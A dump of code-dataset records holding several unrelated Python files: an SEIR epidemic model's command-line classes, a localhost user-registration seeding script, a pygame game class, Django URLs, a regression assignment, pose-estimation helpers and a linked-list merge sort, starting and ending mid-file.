Returns the json string of the command line object.\n\n Returns\n -------\n json_string: str\n The json string of the object.\n \"\"\"\n return json.dumps(asdict(self), indent=4)\n\n\nclass BaseDistributionCLI(BaseCLI):\n \"\"\"\n Base class for command line arguments that define distributions. Assumes that the defined distribution is uniform.\n Parses its own arguments by treating a single input in a list as a float, and two inputs as defining the bounds\n of a uniform distribution. Possesses a sample_attr method that will return a number of random samples from the\n uniform distribution, shaped in such a way as to be digested for the sample parameter objects in the seir.parameters\n module.\n\n Objects inheriting from this should be a dataclass. Parameters of inherited the objects should be defined as a\n dataclass field, with a dict \"metadata\" being parsed as the kwargs of an argument in pythons built-in argparser\n module.\n \"\"\"\n\n _defaults_dict = {}\n\n def __post_init__(self):\n if not self._defaults_dict.keys() == self.__dict__.keys():\n raise NotImplementedError(\"CLI objects _defaults_dict should contain the default values for all \"\n \"attributes.\")\n self._set_defaults()\n\n def _set_defaults(self):\n \"\"\"\n Method for setting of defaults in the base distribution object. Used to overcome problems with setting the\n defaults of parameters that contain the allow appending via the key value pair (\"action\", \"append\") in a\n parameters metedata.\n\n Returns\n -------\n out: bool\n Returns true if performed successfully.\n \"\"\"\n self_vars = self.__dict__\n for k in self_vars:\n self_vars[k] = self._defaults_dict.get(k, None) if self_vars[k] is None else self_vars[k]\n return True\n\n def sample_attr(self, attr: str, nb_groups: int = 1, nb_samples: int = 1) -> np.ndarray:\n \"\"\"\n Samples an attribute of the cli to the required scalar or uniform distribution.\n\n An example of the sampling method applied to an attribute is as follows. Let the attribute of interest be\n named x. If the value of x is a single value in a list, say x=[0.8], then this method will return the\n zero-dimensional numpy array: array(0.8). If instead two values of present, say x=[0, 1], then x is sampled\n from the uniform distribution x ~ U(0, 1). If the parameters metadata allows for appending, then x will be a\n list of lists, say x=[[0.8, 0.9], [0, 1]]. In this case the sampling algorithm is applied to each value within\n the list, leading to a concatenated array x ~ [U(0.8, 0.9), U(0, 1)].\n\n Parameters\n ----------\n attr: str\n Attribute of the CLI to parse.\n\n nb_groups: int, default=1\n Number of population groups from which to define the size of the uniform distribution.\n\n nb_samples: int, default=1\n Number of samples to take from the uniform distribution.\n\n Returns\n -------\n out: np.ndarray\n Returns either a zero dimensional float as an numpy array, or a numpy array of size (nb_groups, nb_samples).\n If the attributes metadata allows appending, then instead the method is applied to each element in the list\n of appended values, returning an array of shape (n, nb_samples), where n is the number of appended elements.\n \"\"\"\n attr_val = getattr(self, attr)\n try:\n if (\n hasattr(self.__dataclass_fields__[attr].type, '__origin__')\n and issubclass(self.__dataclass_fields__[attr].type.__origin__, List)\n ):\n if self.__dataclass_fields__[attr].metadata.get('action', None) == 'append':\n return np.concatenate([_sample_cli_attr(x, 1, nb_samples) for x in attr_val], axis=0)\n return np.asarray(_sample_cli_attr(attr_val, nb_groups, nb_samples))\n return attr_val\n except Exception as e:\n raise ValueError(f\"Attribute '{attr}' failed to be parsed. Raised exception '{e}'.\")\n\n\n@dataclass\nclass LockdownCLI(BaseDistributionCLI):\n \"\"\"\n Lockdown CLI. Used to define the periods of various phases of a lockdown, as well as the relative strength of the\n effects. Any number of lockdown periods and strengths can be defined.\n \"\"\"\n\n _defaults_dict = {\n 'rel_beta_lockdown': REL_BETA_LOCKDOWN_DEFAULT,\n 'rel_beta_period': REL_BETA_PERIOD_DEFAULT,\n }\n\n rel_beta_lockdown: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Bounds of relative beta uniform prior distributions corresponding to relative beta \"\n \"periods. Used to inform the behavior of Rt during periods of lockdown. Negative lower bound \"\n \"implies using the previous sample as a minimum (minus the negative value). Can be called multiple \"\n \"times to create multiple successive lockdown levels.\",\n \"action\": \"append\"\n }\n )\n\n rel_beta_period: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Length of each period for which the relative beta's apply, in days, after the start of lockdown.\"\n \" Can be called multiple times to define multiple successive lockdown periods occurring one after \"\n \"the other.\",\n \"action\": \"append\"\n }\n )\n\n def __post_init__(self):\n super().__post_init__()\n assert len(self.rel_beta_period) == len(self.rel_beta_lockdown), \\\n f\"There should be a one-to-one correspondence between the number of lockdown periods and the strengths of \" \\\n f\"each of the lockdown periods. Instead found {len(self.rel_beta_period)} number of lockdown periods \" \\\n f\"and {len(self.rel_beta_lockdown)} number of lockdown strengths.\"\n\n def sample_attr(self, attr: str, nb_groups: int = 1, nb_samples: int = 1) -> List[np.ndarray]:\n \"\"\"\n Overrides the base sample_attr method to suit the needs of the lockdown parameters. Since lockdowns can have\n various strengths, and may have more certain periods than others, the output of this sampling method is to\n produce a variable list of numpy arrays, rather than a single numpy array.\n\n Parameters\n ----------\n attr: str\n The attribute to sample.\n\n nb_groups: int, default=1\n The number of population groups to sample for.\n\n nb_samples: int, default=1\n The number of samples to take.\n\n Returns\n -------\n out: list\n List of numpy arrays. If the parsed value contained a single element, then a zero dimensional array is\n returned in its place, otherwise a set of samples is given from a uniform distribution defined by the bounds\n of the parsed value.\n \"\"\"\n attr_val = getattr(self, attr)\n outputs = [_sample_cli_attr(attr_val[0], nb_groups, nb_samples)]\n for i in range(1, len(attr_val)):\n if len(attr_val[i]) == 1:\n outputs.append(_sample_cli_attr(attr_val[i], nb_groups, nb_samples))\n elif len(attr_val[i]) == 2:\n if attr_val[i][0] < 0:\n outputs.append(np.random.uniform(outputs[i-1] - abs(attr_val[i][0]), attr_val[i][1],\n size=(nb_groups, nb_samples)))\n else:\n outputs.append(np.random.uniform(attr_val[i][0], attr_val[i][1], size=(nb_groups, nb_samples)))\n return outputs\n\n\n@dataclass\nclass OdeParamCLI(BaseDistributionCLI):\n \"\"\"\n Command line interface for all parameters relating to the Assa Covid SEIR ordinary differential equation.\n \"\"\"\n\n _defaults_dict = {\n 'r0': R0_DEFAULT,\n 'rel_beta_asymptomatic': REL_BETA_ASYMPTOMATIC_DEFAULT,\n 'prop_a': PROP_A_DEFAULT,\n 'prop_s': PROP_S_DEFAULT,\n 'prop_s_to_h': PROP_S_TO_H_DEFAULT,\n 'prop_h_to_c': PROP_H_TO_C_DEFAULT,\n 'prop_h_to_d': PROP_H_TO_D_DEFAULT,\n 'prop_c_to_d': PROP_C_TO_D_DEFAULT,\n 'time_incubate': TIME_INCUBATE_DEFAULT,\n 'time_infectious': TIME_INFECTIOUS_DEFAULT,\n 'time_s_to_h': TIME_S_TO_H_DEFAULT,\n 'time_s_to_c': TIME_S_TO_C_DEFAULT,\n 'time_h_to_c': TIME_H_TO_C_DEFAULT,\n 'time_h_to_r': TIME_H_TO_R_DEFAULT,\n 'time_h_to_d': TIME_H_TO_D_DEFAULT,\n 'time_c_to_r': TIME_C_TO_R_DEFAULT,\n 'time_c_to_d': TIME_C_TO_D_DEFAULT,\n 'contact_k': CONTACT_K_DEFAULT,\n 'mortality_loading': MORTALITY_LOADING_DEFAULT,\n 'hospital_loading': HOSPITAL_LOADING_DEFAULT,\n 'smoothing_time': 11,\n }\n\n r0: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Basic reproductive number r0. Single input defines a scalar value, two inputs define a \"\n \"Uniform prior.\"\n }\n )\n\n rel_beta_asymptomatic: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"The relative infectivity strength of asymptomatic cases. Single input defines a scalar value, two\"\n \" inputs define a Uniform prior.\"\n }\n )\n\n prop_a: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of asymptomatic infected individuals. Single input defines a scalar, two inputs define \"\n \"a Uniform prior.\"\n }\n )\n\n prop_s: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of symptomatic individuals (1 - prop_a) that experience severe symptoms. Defaults to \"\n \"attack rates defined by Ferguson et. al. (see References documentation). \",\n \"action\": \"append\"\n }\n )\n\n prop_s_to_h: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Propotion of severe cases that will be admitted to general hospital. The rest will present \"\n \"directly to ICU. Defaults to calculations based off WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n prop_h_to_c: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of general hospital cases expected to be transferred to critical care. Defaults to \"\n \"calculations based off WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n prop_h_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of general hospital cases that are expected to die. Defaults to calculations based off \"\n \"WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n prop_c_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportions of critical care cases that are expected to die. Defaults to calculations based off \"\n \"WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n time_incubate: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days of disease incubation. Defaults to 5.1. Single attr defines a scalar, two inputs define a \"\n \"Uniform prior.\"\n }\n )\n\n time_infectious: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days that infectious individuals can spread the virus.\"\n }\n )\n\n time_s_to_h: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from onset of symptoms to hospital admission for severe cases. Defaults to 6. Single input \"\n \"defines a scalar, two inputs define a Uniform prior.\"\n }\n )\n\n time_s_to_c: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from onset of symptoms to critcal care admission for severe cases. Defaults to 6. Single \"\n \"input defines a scalar, two inputs define a Uniform prior.\"\n }\n )\n\n time_h_to_c: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from admission of general hospital to critical care, for those that will require it. \"\n \"Defaults to calculations based off WC data (see Data documentation).\"\n }\n )\n\n time_h_to_r: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from general hospital admission to recovery, for those that will recover. Defaults to \"\n \"calculations from WC data (see Data documentation).\"\n }\n )\n\n time_h_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from general hospital admission to death, for those that will die. Defaults to calculations \"\n \"from WC data (see Data documentation).\"\n }\n )\n\n time_c_to_r: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from critical care admission to recovery, for those that will recover. Defaults to \"\n \"calculations from WC data (see Data documentation).\"\n }\n )\n\n time_c_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from critical care admission to death, for those that will die. Defaults to \"\n \"calculations from WC data (see Data documentation).\"\n }\n )\n\n contact_k: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Contact heterogeneity factor from Kong et. al. (see References documentation). Defaults to 0, \"\n \"implying contact is homogeneous.\"\n }\n )\n\n mortality_loading: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Mortality loading parameter applied to deaths. Used to pseudo inform the uncertainty in these\"\n \"parameters while keeping the shape of mortality over age groups constant.\"\n }\n )\n\n hospital_loading: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Hospital loading parameter applied to in bound patients. Used to pseudo inform the uncertainty \"\n \"in these parameters while keeping the shape of those going to hospital over age groups constant.\"\n }\n )\n\n smoothing_time: float = field(\n default=11,\n metadata={\n \"help\": \"Period over which the lockdown is smoothed before the lockdown begins. Interpolates the relative \"\n \"beta strength from 1 to the first lockdown beta strength value linearly over the smoothing period.\"\n }\n )\n\n\n@dataclass\nclass MetaCLI(BaseCLI):\n \"\"\"\n Command line interface that stores any meta data about the system we are solving, such as the number of samples\n the ode is taking, as well as whether or not the model should incorporate an age heterogenous structure. The age\n heterogeneity is introduced by means of 10 year age bands.\n \"\"\"\n\n nb_samples: Optional[int] = field(\n default=NB_SAMPLES_DEFAULT,\n metadata={\n \"help\": \"Number of samples to take for the prior distributions in the ASSA model SIR algorithm.\"\n }\n )\n\n age_heterogeneity: bool = field(\n default=AGE_GROUPS_DEFAULT,\n metadata={\n \"help\": \"Flag to set the use of population age bands. Bands are in ten years, from 0-9, 10-19, ..., to \"\n \"80+. The age defined attack rates are informed by Ferguson et al. (see References documentation).\"\n }\n )\n\n nb_groups: int = field(init=False)\n\n def __post_init__(self):\n self.nb_groups = 9 if self.age_heterogeneity else 1\n\n\n@dataclass\nclass FittingCLI(BaseCLI):\n \"\"\"\n Command line interface for all fitting parameters used by the model.\n \"\"\"\n\n nb_runs: Optional[int] = field(\n default=NB_RUNS_DEFAULT,\n metadata={\n \"help\": \"Number of runs to perform. Used when running into memory errors with a large number of samples. \"\n \"Final result will have had nb_samples * nb_runs number of samples for the prior, and \"\n \"ratio_resample * nb_samples * nb_runs number of resamples.\"\n }\n )\n\n ratio_resample: Optional[int] = field(\n default=0.05,\n metadata={\n \"help\": \"The percentage of resamples to take in the SIR algorithm.\"\n }\n )\n\n fit_totals: bool = field(\n default=True,\n metadata={\n \"help\": \"Fit data to the sub totals of all population groups. Useful when the data does not contain \"\n \"population group differences (as in, for example, the DSFSI data.\"\n }\n )\n\n fit_deaths: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to death data, if available.\"\n }\n )\n\n fit_recovered: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to recovered data, if available.\"\n }\n )\n\n fit_infected: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to infected cases, if available.\"\n }\n )\n\n fit_hospitalised: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to hospital data, if available.\"\n }\n )\n\n fit_critical: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to ICU data, if available.\"\n }\n )\n\n fit_daily: bool = field(\n default=False,\n metadata={\n \"help\": \"Will fit to daily cases/deaths/etc cases instead of cumulative cases. Used to remove the serial \"\n \"dependence found in such cumulative cases.\"\n }\n )\n\n fit_interval: int = field(\n default=1,\n metadata={\n \"help\": \"For concurrent data (hospital/icu cases), fitter will fit to every X data point, where X is \"\n \"defined here. If fitting to daily cases (see --fit_daily), will take a sum of X data points to \"\n \"use in fitting (in order to smooth out the fitting data and account for the noise in daily \"\n \"reporting statistics).\"\n }\n )\n","repo_name":"Percept-Health-Solve/seir-model","sub_path":"seir/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":21282,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32952304303","text":"#!/usr/bin/env python\nimport requests\nport = 8000\nhostname = 'localhost'\nurl = 'http://'+hostname+':'+str(port)+'/auth/register/'\n\n\ndef main():\n print(\"Propagating users...\")\n with open(\"list_users\") as file:\n listOfShops = file.readlines()\n for row in listOfShops:\n row = row.strip().split()\n print(row)\n payload = {'email': row[0], \n 'phone_number': row[1],\n 'password': row[2],\n 'is_supplier': row[3]}\n\n request = requests.post(url, data=payload)\n print(\"Requested: \"+request.url)\n print(request.status_code)\n print(request.json())\n\nmain()\n","repo_name":"ahmed-emam/dukanty","sub_path":"src/propagateDatabase/propagateUsers.py","file_name":"propagateUsers.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29573876726","text":"\"\"\"\nArquivo para criação da classe Serra\n\"\"\"\nimport pygame\nfrom auxiliar import *\n\n\nclass Serra(object):\n def __init__(self, x, y, larg, alt):\n self.x = x\n self.y = y\n self.larg = larg\n self.alt = alt\n self.hitbox = (x, y, larg, alt)\n self.aniCount = 0\n self.img = [pygame.image.load('Img/Serra/SAW0.png'),\n pygame.image.load('Img/Serra/SAW1.png'),\n pygame.image.load('Img/Serra/SAW2.png'),\n pygame.image.load('Img/Serra/SAW3.png')]\n\n def draw(self):\n # Define a área da serra\n self.hitbox = (self.x, self.y, self.larg, self.alt)\n # Contador para a animação da serra\n if self.aniCount >= 8:\n self.aniCount = 0\n # Desenha a serra\n tela.blit(pygame.transform.scale(self.img[self.aniCount // 2], (50, 50)), (self.x, self.y))\n self.aniCount += 1\n # Desenha a área da serra\n # pygame.draw.rect(tela, (255, 0, 0), self.hitbox, 2)\n\n def collide(self, rect):\n # Teste para colisão no eixo X\n if rect[0] + rect[2] > self.hitbox[0] and rect[0] < self.hitbox[0] + self.hitbox[2]:\n # Teste para colisão no eixo Y\n if rect[1] + rect[3] > self.hitbox[1]:\n return True\n return False\n","repo_name":"gcb2708/PI_1B_vF","sub_path":"classe_serra.py","file_name":"classe_serra.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17258177096","text":"from django.conf.urls import url\nfrom . import views\n\n#different url patterns using the different methods\napp_name = 'blog'\n\nurlpatterns = [\n\turl(r'^$',views.post_list),\n\turl(r'add$',views.add, name='add'),\n#\turl(r'details/(?P[\\w :-]+)/$', views.blog_detail, name=\"detail\"),\n\turl(r'details/(?P[0-9]+)/$', views.blog_detail, name=\"detail\"),\n\turl(r'new_post/$', views.post_new, name=\"new_post\"),\n\turl(r'edit_post/(?P[0-9]+)/$', views.post_edit, name=\"post_edit\"),\n#\turl(r'^comment/(?P\\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'),\n]\n","repo_name":"Haris1337/Tutorial1","sub_path":"mysite/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40794079234","text":"import numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\ndef hardCodeGradientDescent(columns):\n\tlearn_rate=0.0001\n\tnumber_iter=100\n\tinitial_weights=np.random.normal(size=(columns,1))\n\treturn learn_rate,number_iter,initial_weights\n\n\ndef hardCodeTraining(rows):\n\tpercent_training=0.8\n\tnumber_of_dataPoints=rows\n\treturn math.floor(percent_training*number_of_dataPoints)\n\ndef getData():\n\tfileName=\"./Folds5x2_pp.xlsx\"\n\tcolumn_headers=[\"Temperature\",\"Vacuum\",\"Pressure\",\"Humidity\",\"Power\"]\n\ttempFrame = pd.read_excel(fileName,sheet_name=0,names=column_headers)\n\treturn tempFrame\n\ndef predict(weights,inp):\n\treturn np.matmul(inp,weights) # weights is a column matrix\n\ndef MLE(dataset):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y) # as the previous gives a 2D row vector\n\tdataset=dataset[:,:-1]\n\n\tone=np.ones((rows,1))\n\taug_mat=np.hstack((one,dataset)) # adding the column of ones\n\n\tprod=np.matmul(np.transpose(aug_mat),aug_mat)\n\tintermediate=np.matmul(np.linalg.inv(prod),np.transpose(aug_mat))\n\tweights=np.matmul(intermediate,y)\n\tnp.transpose(weights)\n\treturn weights\n\ndef gradDes(dataset):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tlearn_rate,number_iter,weights=hardCodeGradientDescent(columns)\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tgrad=np.zeros( ((columns),1) )\n\tdataset=dataset[:,:-1]\n\t# print(dataset.shape)\n\t# print(dataset[:10,:])\n\n\tfor i in range(number_iter):\n\t\ty_predicted=predict(weights,dataset)\n\t\tfor j in range(columns): # we exclude the last as it has the dependent variable\n\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) # ycap-y multiplied by x\n\t\t\tweights[j]-=learn_rate*grad[j] # we make use of the older values of w to get the new ones\n\n\treturn weights\n\ndef ridge(dataset,lmbda):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tlearn_rate,number_iter,weights=hardCodeGradientDescent(columns)\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tgrad=np.zeros( ((columns),1) )\n\tdataset=dataset[:,:-1]\n\n\tfor i in range(number_iter):\n\t\ty_predicted=predict(weights,dataset)\n\t\tfor j in range(columns): # we exclude the last as it has the dependent variable\n\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) + 2*lmbda*weights[j] # ycap-y multiplied by x column and accounting for the regularization term\n\t\t\tweights[j]-=learn_rate*grad[j] # we make use of the older values of w to get the new ones\n\n\treturn weights\n\ndef lasso(dataset,lmbda):\n\trows=dataset.shape[0]\n\tcolumns=dataset.shape[1]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tlearn_rate,number_iter,weights=hardCodeGradientDescent(columns)\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tgrad=np.zeros( ((columns),1) )\n\tdataset=dataset[:,:-1]\n\n\tfor i in range(number_iter):\n\t\ty_predicted=predict(weights,dataset)\n\t\tfor j in range(columns): # we exclude the last as it has the dependent variable\n\t\t\tif(weights[j]<0):\n\t\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) - lmbda # ycap-y multiplied by x column\n\t\t\telse:\n\t\t\t\tgrad[j]=np.matmul(np.transpose(y_predicted-y),dataset[:,j]) + lmbda\n\n\t\t\tweights[j]-=learn_rate*grad[j] # we make use of the older values of w to get the new ones\n\n\treturn weights\n\ndef normalize(dataset):\n\tmeans=dataset.mean(axis=0,keepdims=True)\n\tstddevs=dataset.std(axis=0,keepdims=True)\n\tdataset=dataset - means # subtract the corresponding means\n\tdataset=dataset / stddevs # devide the corresponding standard deviations\n\treturn dataset\n\ndef error(weights,dataset):\n\trows=dataset.shape[0]\n\tone=np.ones((rows,1))\n\tdataset=np.hstack((one,dataset))\n\tcolumns=dataset.shape[1]\n\ty=dataset[:,-1][np.newaxis] # get the last column containing the power consumption data\n\ty=np.transpose(y)\n\tdataset=dataset[:,:-1]\n\ty_predicted=predict(weights,dataset)\n\tvalues=(y_predicted-y)\n\terror = np.matmul(np.transpose(values),values)\n\n\terror /=2*rows\n\treturn error\n\ndef main():\n\tlimit=10\n\tdataset = getData()\n\trows=dataset.shape[0]\n\tnumber_training=hardCodeTraining(rows)\n\n\t# splitting to two parts\n\ttraining_data=dataset.iloc[:number_training][:]\n\ttest_data=dataset.iloc[number_training: ][:]\n\n\t# print (training_data)\n\t# print (test_data)\n\n\t# converting to 2D matrix for ease of use\n\n\ttraining_data=training_data.values\n\ttest_data=test_data.values\n\n\tnormalised_training_data=normalize(training_data)\n\tnormalised_test_data=normalize(test_data)\n\n\tprint(\"***********MLE********************************\")\n\tweights=MLE(normalised_training_data)\n\tprint(weights)\n\tprint(\"The error is:\")\n\tprint(error(weights,normalised_test_data))\n\tprint(\"***********Gradient Descent********************************\")\n\tweights=gradDes(normalised_training_data)\n\tprint(weights)\n\tprint(\"The error is:\")\n\tprint(error(weights,normalised_test_data))\n\n\tinitalVal=1\n\tlmbda = initalVal\n\terrorList1=np.array([])\n\terrorList2=np.array([])\n\twhile lmbda>2**(-1*limit):\n\t\tprint(\"\\n\")\n\t\tprint(\"Value of lambda %s\"%(lmbda))\n\t\tprint(\"***********Lasso********************************\")\n\t\tweights=lasso(normalised_training_data,lmbda)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\terrorList1=np.append(errorList1,error(weights,normalised_test_data))\n\t\tprint(errorList1[-1])\n\t\tprint(\"***********Ridge********************************\")\n\t\tweights=ridge(normalised_training_data,lmbda)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\terrorList2=np.append(errorList2,error(weights,normalised_test_data))\n\t\tprint(errorList2[-1])\n\t\tprint(\"*************************************************\")\n\t\tlmbda/=2\n\n\n\tlmbdaVals=[2**(-1*i) for i in range(0, limit)]\n\n\tplot1,=plt.plot(lmbdaVals,errorList1)\n\tplot2,=plt.plot(lmbdaVals,errorList2)\n\tplt.xlabel('Lambda Value')\n\tplt.ylabel('Mean Squared Error')\n\tplt.legend([plot1,plot2],['Lasso Regression','Ridge Regression'])\n\tplt.show()\n\n\tlowerLimit=10**(-4)\n\tupperLimit=10**(-2)\n\txvals=np.array([])\n\tyvals1=np.array([])\n\tyvals2=np.array([])\n\n\tfor i in range(0,101,1):\n\t\ti=lowerLimit+lowerLimit*i\n\t\tprint(\"\\n\")\n\t\tprint(\"Value of lambda %s\"%(i))\n\t\tprint(\"***********Lasso********************************\")\n\t\tweights=lasso(normalised_training_data,i)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\tyvals1=np.append(yvals1,error(weights,normalised_test_data))\n\t\tprint(yvals1[-1])\n\t\tprint(\"***********Ridge********************************\")\n\t\tweights=ridge(normalised_training_data,i)\n\t\tprint(weights)\n\t\tprint(\"The error is:\")\n\t\tyvals2=np.append(yvals2,error(weights,normalised_test_data))\n\t\tprint(yvals2[-1])\n\t\tprint(\"*************************************************\")\n\t\txvals=np.append(xvals,i)\n\n\tplot1,=plt.plot(xvals,yvals1)\n\tplot2,=plt.plot(xvals,yvals2)\n\tplt.xlabel('Lambda Value')\n\tplt.ylabel('Mean Squared Error')\n\tplt.legend([plot1,plot2],['Lasso Regression','Ridge Regression'])\n\tplt.show()\n\nif __name__=='__main__':\n\tmain()\n","repo_name":"Vishalcross/Data_Science_Assignment","sub_path":"Assignment 3 + 4/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15574543842","text":"import cv2\nimport mediapipe as mp\nimport time\nimport pandas as pd\nimport re\nimport pickle\nimport sklearn\n\n\ndef csv_converter(path, fname):\n df = pd.read_csv(path + fname, sep=\";\")\n df_ = pd.DataFrame(data=df)\n all_coordinates = []\n all_poses = []\n for col_num in range(len(df_)):\n all_poses.append([df_.loc[col_num].values[2]])\n all_coordinates.append([])\n for i in range(3, len(df_.loc[col_num].values)):\n nums = re.findall(\"[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*(?:[eE][-+]?\\d+)?\", df_.loc[col_num].values[i])\n for num in nums:\n all_coordinates[col_num].append(float(num))\n\n return all_poses, all_coordinates\n\n\ndef pose_to_num(poses_):\n # poses_list = [\"walk\", \"fall\", \"fallen\", \"sitting\"]\n all_poses_num = []\n for pose in poses_:\n if pose[0] == \"walk\":\n all_poses_num.append([\"0\"])\n if pose[0] == \"fall\":\n all_poses_num.append([\"1\"])\n if pose[0] == \"fallen\":\n all_poses_num.append([\"2\"])\n if pose[0] == \"sitting\":\n all_poses_num.append([\"3\"])\n\n return all_poses_num\n\n\ndef get_pose_from_num(pose_number):\n if pose_number[0] == \"0\":\n return \"walk\"\n if pose_number[0] == \"1\":\n return \"fall\"\n if pose_number[0] == \"2\":\n return \"fallen\"\n if pose_number[0] == \"3\":\n return \"sitting\"\n else:\n return \"code_error\"\n\n\ndef get_coords_line(kps):\n coords_line = []\n for kp in kps:\n coords_line.append(kp[0])\n coords_line.append(kp[1])\n return coords_line\n\n\ndef get_keypoints(landmarks, w, h):\n kps = []\n kps2 = []\n for i in range(len(landmarks.landmark)):\n kps.append((landmarks.landmark[i].x * w, landmarks.landmark[i].y * h))\n return kps\n\n\ndef keypoints_parser(kps, dt_line):\n human = kps\n for points in human:\n dt_line.append((round(points[0], 2), round(points[1], 2)))\n return dt_line\n","repo_name":"Kexitor/HPE_Mediapipe","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9542552406","text":"from random import randint\ntupla = []\nfor i in range(0,5):\n numRandom = randint(0,10)\n tupla.append(numRandom)\ntupla = tuple(tupla)\nprint(\"A lista gerada aleatoriamente foi: \")\nfor n in tupla:\n print(f\"{n},\", end = \" \")\nprint(f\"O menor valor da lista foi {min(tupla)}\\n E o maior valor {max(tupla)}\")","repo_name":"AbelRapha/Python-Exercicios-CeV","sub_path":"Mundo 3/ex074 Maior e menor valores em uma tupla.py","file_name":"ex074 Maior e menor valores em uma tupla.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41101640468","text":"class Node:\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\nclass LL:\n\tdef __init__(self):\n\t\tself.head = None\n\n\tdef append(self, data):\n\t\tnew_node = Node(data)\n\n\t\tif self.head is None:\n\t\t\tself.head = new_node\n\t\t\treturn\n\t\ttemp = self.head\n\t\twhile temp.next is not None:\n\t\t\ttemp = temp.next\n\t\ttemp.next = new_node\n\n\t# utility function to get middle of linked list\n\tdef get_middle(self, head):\n\t\tif head == None:\n\t\t\treturn head\n\n\t\tslow = head\n\t\tfast = head\n\n\t\twhile (fast.next != None and fast.next.next != None):\n\t\t\tslow = slow.next\n\t\t\tfast = fast.next.next\n\n\t\treturn slow\n\n\tdef sorted_merge(self, a, b):\n\t\tresult = None\n\n\t\t# base cases\n\t\tif a == None:\n\t\t\treturn b\n\t\tif b == None:\n\t\t\treturn a\n\n\t\tif a.data <= b.data:\n\t\t\tresult = a\n\t\t\tresult.next = self.sorted_merge(a.next, b)\n\t\telse:\n\t\t\tresult = b\n\t\t\tresult.next = self.sorted_merge(a, b.next)\n\t\treturn result\n\n\tdef merge_sort(self, head):\n\t\t\n\t\t# base case\n\t\tif head == None or head.next == None:\n\t\t\treturn head\n\n\t\t# getting the middle of the list\n\t\tmiddle = self.get_middle(head)\n\t\tnext_to_middle = middle.next\n\n\t\tmiddle.next = None\n\n\t\tleft = self.merge_sort(head)\n\t\tright = self.merge_sort(next_to_middle)\n\n\t\tsortedlist = self.sorted_merge(left, right)\n\t\treturn sortedlist\n\n\ndef printList(head): \n if head is None: \n print(' ') \n return\n curr_node = head \n while curr_node: \n print(curr_node.data, end = \" \") \n curr_node = curr_node.next\n print(' ')\n\n\nli = LL() \n 